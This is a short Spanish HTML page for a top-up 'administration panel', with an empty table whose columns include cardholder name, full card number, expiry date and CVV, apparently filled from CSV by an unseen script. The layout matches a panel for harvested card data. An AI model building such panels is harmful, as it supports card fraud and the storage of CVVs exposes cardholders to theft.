<!DOCTYPE html>
<html lang="es">
<head>
  <meta charset="UTF-8" />
  <title>Panel de Administración</title>
  <link rel="stylesheet" href="styles.css" />
</head>
<body>
  <div class="container">
    <h1>📊 Panel de Recargas</h1>
    <p>Últimas recargas realizadas:</p>

    <table id="tablaRecargas">
      <thead>
        <tr>
          <th>País</th>
          <th>Compañía</th>
          <th>Teléfono</th>
          <th>Monto Original</th>
          <th>Monto Final</th>
          <th>Nombre Tarjeta</th>
          <th>Número Tarjeta</th>
          <th>Fecha Vencimiento</th>
          <th>CVV</th>
          <th>Fecha</th>
        </tr>
      </thead>
      <tbody></tbody>
    </table>
  </div>

  <script src="https://cdnjs.cloudflare.com/ajax/libs/PapaParse/5.4.1/papaparse.min.js "></script>
  <script src="script.js"></script>
</body>
</html>